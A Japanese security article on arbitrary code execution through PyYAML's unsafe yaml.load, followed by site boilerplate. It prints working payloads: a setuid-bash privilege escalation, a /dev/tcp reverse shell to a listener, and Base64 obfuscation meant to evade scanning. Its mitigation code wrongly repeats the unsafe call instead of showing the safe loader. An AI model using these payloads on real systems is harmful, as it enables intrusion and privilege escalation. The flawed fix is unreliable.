Python の YAML (YAML Ain't Markup Language) ライブラリには、特定の条件下で任意のコマンドの実行を可能にする脆弱性があることが確認されました。この脆弱性は、安全なローダーを指定せずに yaml.load 関数を使用することで発生します。デフォルトでは、yaml.load は任意の Python オブジェクトを実行でき、これにより悪意のあるペイロードに対する攻撃対象領域が作成されます。
任意のコマンド実行による悪用
根本的なリスクは逆シリアル化プロセスにあります。 YAML ドキュメントに悪意のあるペイロードが含まれている場合、yaml.load は埋め込まれたディレクティブを処理し、コードが実行される可能性があります。たとえば、次のスニペットを考えてみましょう:
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
ここで、yaml.load 関数は制限なしで example.yml を解析するため、YAML コンテンツに安全でないディレクティブが含まれている場合に脆弱になります。一般的なエクスプロイト ペイロードは、任意のシステム コマンドを実行するように作成される可能性があります。
ペイロードの例
import yaml from yaml import Loader, UnsafeLoader # Malicious payload payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]' # Exploitation yaml.load(payload) yaml.load(payload, Loader=Loader) yaml.load(payload, Loader=UnsafeLoader)
これらの各呼び出しでペイロードが処理され、その結果、/tmp/bash に特権付き実行可能ファイルが作成されます。このバイナリは、昇格された特権で実行できます:
/tmp/bash -p
これは、権限が正しく設定されていないシステム上でこの脆弱性が悪用された場合、またはその他の弱点がある場合に権限昇格の可能性があることを示しています。
リバースシェルエクスプロイト
特に危険な使用例は、リバース シェルの脆弱性を利用することです。これにより、攻撃者はターゲット マシンにリモート アクセスできるようになります。このプロセスには、攻撃者のマシン上でリスナーを開始し、逆接続を確立するように設計された YAML ドキュメントを作成することが含まれます。
攻撃者のマシンで、Netcat リスナーを開始します。
nc -lvnp 1234
ターゲット システムで、root として次の Python スクリプトを実行します。
import yaml # Reverse shell payload data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]' yaml.load(data) # Executes the reverse shell
このペイロードは、ターゲット マシンに攻撃者のリスナーに接続し直すよう指示し、実行プロセスの権限を持つ完全に対話型のシェルを提供します。
難読化のためのBase64エンコーディング
基本的なセキュリティ制御またはフィルターをバイパスするには、ペイロードを Base64 でエンコードできます。この方法では難読化のレイヤーが追加され、静的分析ツールによる検出を回避できる可能性があります。
例
from base64 import b64decode import yaml # Base64-encoded payload encoded_payload = b"ISFweXRa...YXNoIl0=" # Truncated for brevity payload = b64decode(encoded_payload) # Execute the payload yaml.load(payload)
緩和手法
専門家は、このような脆弱性を排除するために厳密なコーディング手法を採用する必要があります。推奨される緩和策は次のとおりです:
-
セーフ ローダーの使用: yaml.load を yaml.safe_load に置き換えます。これにより、任意のオブジェクトの実行が防止されます。
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
入力ソースの制限: YAML 入力がサニタイズされ、信頼できるソースからのみ送信されていることを確認します。
静的分析の適用: ツールを使用して、安全でない yaml.load 呼び出しのコードベースをスキャンします。
環境強化: 悪用の影響を最小限に抑えるためにシステム権限を制限します。たとえば、コンテナ化された環境を使用すると、攻撃者が権限を昇格する能力が制限されます。
YAML ライブラリのデフォルトの動作は、Python などの動的型付け言語での逆シリアル化に関連するリスクを例示しています。この脆弱性の悪用には最小限の高度な技術が必要であり、安全なアプリケーション開発においては優先度の高い問題となります。これらのリスクを効果的に軽減するには、安全なコーディング手法を採用するとともに、堅牢な入力検証と実行時の安全対策が不可欠です。
以上がPython で YAML を使用する場合は注意してください。セキュリティ上の脆弱性がある可能性がありますの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

PythonとCにはそれぞれ独自の利点があり、選択はプロジェクトの要件に基づいている必要があります。 1)Pythonは、簡潔な構文と動的タイピングのため、迅速な開発とデータ処理に適しています。 2)Cは、静的なタイピングと手動メモリ管理により、高性能およびシステムプログラミングに適しています。

PythonまたはCの選択は、プロジェクトの要件に依存します。1)迅速な開発、データ処理、およびプロトタイプ設計が必要な場合は、Pythonを選択します。 2)高性能、低レイテンシ、および緊密なハードウェアコントロールが必要な場合は、Cを選択します。

毎日2時間のPython学習を投資することで、プログラミングスキルを効果的に改善できます。 1.新しい知識を学ぶ:ドキュメントを読むか、チュートリアルを見る。 2。練習:コードと完全な演習を書きます。 3。レビュー:学んだコンテンツを統合します。 4。プロジェクトの実践:実際のプロジェクトで学んだことを適用します。このような構造化された学習計画は、Pythonを体系的にマスターし、キャリア目標を達成するのに役立ちます。

2時間以内にPythonを効率的に学習する方法は次のとおりです。1。基本的な知識を確認し、Pythonのインストールと基本的な構文に精通していることを確認します。 2。変数、リスト、関数など、Pythonのコア概念を理解します。 3.例を使用して、基本的および高度な使用をマスターします。 4.一般的なエラーとデバッグテクニックを学習します。 5.リストの概念を使用したり、PEP8スタイルガイドに従ったりするなど、パフォーマンスの最適化とベストプラクティスを適用します。

Pythonは初心者やデータサイエンスに適しており、Cはシステムプログラミングとゲーム開発に適しています。 1. Pythonはシンプルで使いやすく、データサイエンスやWeb開発に適しています。 2.Cは、ゲーム開発とシステムプログラミングに適した、高性能と制御を提供します。選択は、プロジェクトのニーズと個人的な関心に基づいている必要があります。

Pythonはデータサイエンスと迅速な発展により適していますが、Cは高性能およびシステムプログラミングにより適しています。 1. Python構文は簡潔で学習しやすく、データ処理と科学的コンピューティングに適しています。 2.Cには複雑な構文がありますが、優れたパフォーマンスがあり、ゲーム開発とシステムプログラミングでよく使用されます。

Pythonを学ぶために1日2時間投資することは可能です。 1.新しい知識を学ぶ:リストや辞書など、1時間で新しい概念を学びます。 2。練習と練習:1時間を使用して、小さなプログラムを書くなどのプログラミング演習を実行します。合理的な計画と忍耐力を通じて、Pythonのコアコンセプトを短時間で習得できます。

Pythonは学習と使用が簡単ですが、Cはより強力ですが複雑です。 1。Python構文は簡潔で初心者に適しています。動的なタイピングと自動メモリ管理により、使いやすくなりますが、ランタイムエラーを引き起こす可能性があります。 2.Cは、高性能アプリケーションに適した低レベルの制御と高度な機能を提供しますが、学習しきい値が高く、手動メモリとタイプの安全管理が必要です。


ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

人気の記事

ホットツール

VSCode Windows 64 ビットのダウンロード
Microsoft によって発売された無料で強力な IDE エディター

MinGW - Minimalist GNU for Windows
このプロジェクトは osdn.net/projects/mingw に移行中です。引き続きそこでフォローしていただけます。 MinGW: GNU Compiler Collection (GCC) のネイティブ Windows ポートであり、ネイティブ Windows アプリケーションを構築するための自由に配布可能なインポート ライブラリとヘッダー ファイルであり、C99 機能をサポートする MSVC ランタイムの拡張機能が含まれています。すべての MinGW ソフトウェアは 64 ビット Windows プラットフォームで実行できます。

mPDF
mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。

PhpStorm Mac バージョン
最新(2018.2.1)のプロフェッショナル向けPHP統合開発ツール

SublimeText3 英語版
推奨: Win バージョン、コードプロンプトをサポート!
